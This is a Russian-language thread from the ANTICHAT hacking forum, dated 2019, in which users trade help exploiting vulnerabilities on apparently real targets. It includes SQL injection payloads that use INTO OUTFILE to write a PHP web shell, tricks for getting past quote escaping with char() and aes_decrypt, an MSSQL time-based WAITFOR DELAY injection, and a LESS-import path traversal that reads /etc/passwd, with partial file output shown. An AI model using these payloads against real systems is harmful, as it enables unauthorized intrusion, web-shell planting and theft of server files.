ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
11.02.2019, 18:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
9177
Репутация:
4
|
|
Сообщение от crlf
crlf said:
↑
В ошибке явно указано, что нарушен синтаксис. Лучше один раз увидеть, то бишь установить локально MySQL и разобраться в синтаксисе. Или, как минимум, почитать гайды по SQL инъекциям для новичков. Гайды перечитаны) уже голова трещит от них(
Спасибо! Но вы дали ссылку на входящий параметр до LIMIT.
У меня же можно инъектироваться после ORDER BY id LIMIT 0,5 >
Если я пробую UNION, то выдает ошибку что ORDERне совместим с UNION((
|
|
|
|
11.02.2019, 18:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
9177
Репутация:
4
|
|
Нашла еще способ инъекции:
SELECT id,name FROM cities ORDER BY id LIMIT 0,5 INTO @var1,@var2
Но кроме переменных ничего невозможно вставить(
Так не хочет:
SELECT id,name FROM cities ORDER BY id LIMIT 0,5 INTO (SELECT 1),@var2
Есть идеи у кого-нибудь?
|
|
|
|
12.02.2019, 03:26
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
Сообщение от giloo
giloo said:
↑
Нашла еще способ инъекции:
SELECT id,name FROM cities ORDER BY id LIMIT 0,5
INTO @var1,@var2
Но кроме переменных ничего невозможно вставить(
Так не хочет:
SELECT id,name FROM cities ORDER BY id LIMIT 0,5 INTO (SELECT 1),@var2
Есть идеи у кого-нибудь? INTO - https://dev.mysql.com/doc/refman/8.0...lect-into.html
Сообщение от giloo
giloo said:
↑
procedure analyse(1,1) помогает, но не позволяет вызывать функции в параметрах(
То есть даже не дает 1+1 внутри выполнить DoS Bug - https://nvd.nist.gov/vuln/detail/CVE-2015-4870
Он давно пофиксен, подзапросы больше не работают! Можете вывести только, например, название текущей базы данных, версию и текущего пользователя от которого идет подключение!
Если у пользователя есть права на запись в фс пробуйте:
Код:
Code:
?q=1 into outfile '/path/to/shell.php' lines terminated by ""--+
?q=1 into outfile '/path/to/shell.php' fields terminated by '' optionally enclosed by ""--+
|
|
|
12.02.2019, 11:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
9177
Репутация:
4
|
|
Сообщение от cat1vo
cat1vo said:
↑
INTO -
https://dev.mysql.com/doc/refman/8.0...lect-into.html
DoS Bug -
https://nvd.nist.gov/vuln/detail/CVE-2015-4870
Он давно пофиксен, подзапросы больше не работают! Можете вывести только, например, название текущей базы данных, версию и текущего пользователя от которого идет подключение!
Если у пользователя есть права на запись в фс пробуйте:
Код:
Code:
?q=1 into outfile '/path/to/shell.php' lines terminated by ""--+
?q=1 into outfile '/path/to/shell.php' fields terminated by '' optionally enclosed by ""--+
Спасибо! К несчастью сервер экранирует ковычки. А на строку в виде hex ругается... Значит здесь все? Никак нельзя?(
|
|
|
|
12.02.2019, 15:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
96779
Репутация:
5
|
|
Сообщение от giloo
giloo said:
↑
Спасибо! К несчастью сервер экранирует ковычки. А на строку в виде hex ругается... Значит здесь все? Никак нельзя?( char(), aes_decrypt(aes_encrypt())
|
|
|
|
14.02.2019, 13:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
282
Репутация:
0
|
|
есть инъекция вида
Код:
Code:
param=1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
как выводить через нее что либо?
и есть ли возможность подружить с мапом как-то? |
|
|
|
17.02.2019, 17:09
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
есть локальный инклуд позволяющий читать произвольные файлы /style.less?update=e51qf61z&imports[]=../../../../../../../../../../../etc/passwd
проблема в выводе которая ограничивается 6 строками есть идеи как обойти?
|
|
|
|
17.02.2019, 17:16
|
|
Постоянный
Регистрация: 05.06.2009
Сообщений: 706
Провел на форуме:
2764047
Репутация:
759
|
|
Сообщение от pinch
pinch said:
↑
есть локальный инклуд позволяющий читать произвольные файлы /style.less?update=e51qf61z&imports[]=../../../../../../../../../../../etc/passwd
проблема в выводе которая ограничивается 6 строками есть идеи как обойти? Возможно, ограничение в вывод 6 строк, заложено изначально в серверном приложении, к которому идёт обращение и обработка скрипта.
|
|
|
|
17.02.2019, 17:49
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
файлы с форматом less нормально читаются /style.less?update=e51qf61z&imports[]=/css/main/themes/default.less а вот с другими парсер выдает ошибку
/* LESS COMPILE ERROR */
/* ParseError: Unexpected input in robots.txt on line 1, column 10
1| User-Agent: *
2|
3| Disallow: /1
4| Disallow: /2
5| Disallow: /3
6| Disallow: /4 */
|
|
|
|
17.02.2019, 19:22
|
|
Постоянный
Регистрация: 05.06.2009
Сообщений: 706
Провел на форуме:
2764047
Репутация:
759
|
|
Сообщение от pinch
pinch said:
↑
файлы с форматом less нормально читаются /style.less?update=e51qf61z&imports[]=/css/main/themes/default.less а вот с другими парсер выдает ошибку
/* LESS COMPILE ERROR */
/* ParseError: Unexpected input in robots.txt on line 1, column 10
1| User-Agent: *
2|
3| Disallow: /1
4| Disallow: /2
5| Disallow: /3
6| Disallow: /4 */ Строку User-agent, сервер желает видеть не *, а вполне браузерного вида:
Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0, не так ли?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
